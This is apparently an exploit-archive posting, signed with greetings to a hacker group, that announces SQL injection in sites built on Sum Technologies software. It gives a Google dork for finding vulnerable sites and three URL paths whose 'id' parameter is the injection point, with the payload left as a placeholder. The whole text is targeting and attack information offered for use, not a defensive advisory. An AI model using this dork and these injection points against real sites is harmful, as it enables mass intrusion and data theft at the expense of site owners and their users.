Sites powered by Sum Technologies suffer from a remote SQL injection vulnerability.
06c7dae6b8696e76584fd12c41cd4d73302c77f8041397f5b4dd389cfad30972
# Exploit Author:Th3 R0cksT3r
# Exploit Title: Sum Technologies (id) SQL Injection Vulnerability
# Email: th3rockst3r@gmail.com
# Vendor Homepage: http://www.sumtechnologies.com/
# Google Dork: intext:"Powered by Sum Technologies"
Proof Of Concept:
1. https://server/elf_erecting.php?id=[SQL Injection]
2. http://server/index.php?do=view_model&id=[SQL Injection]
3. http://server/about.php?id=[SQL Injection]
# Greetz:Bangladesh Black HAT Hackers